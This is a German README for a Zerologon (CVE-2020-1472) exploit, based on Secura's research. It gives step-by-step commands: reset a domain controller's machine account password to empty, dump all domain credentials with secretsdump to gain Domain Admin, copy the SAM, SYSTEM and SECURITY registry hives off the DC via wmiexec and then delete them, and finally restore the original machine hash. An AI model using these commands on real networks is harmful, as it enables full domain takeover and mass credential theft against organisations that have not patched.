
Exploit für zerologon cve-2020-1472
Exploit-Code basierend auf https://www.secura.com/blog/zero-logon und https://github.com/SecuraBV/CVE-2020-1472. Ursprüngliche Forschung und Scanner von Secura, Modifikationen von RiskSense Inc.
Um zu exploitieren, entfernen Sie alle vorherigen Impacket-Installationen und installieren Sie Impacket von https://github.com/SecureAuthCorp/impacket/commit/b867b21 oder neuer. Führen Sie dann aus:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Wenn das erfolgreich ist, können Sie dann:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
was Ihnen Domain Admin verschaffen sollte. Nachdem Sie das haben, verwenden Sie wmiexec.py auf dem Ziel-DC mit einem Credential aus dem secretsdump und führen Sie aus:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
Dann können Sie
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Und das sollte Ihnen den ursprünglichen NT-Hash des Maschinenkontos anzeigen. Sie können dann diesen ursprünglichen Maschinenkonten-Hash mit folgendem Befehl in der Domäne wiederherstellen:
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Die Wiederherstellung des ursprünglichen Hashs ist notwendig, damit der DC normal weiterarbeiten kann.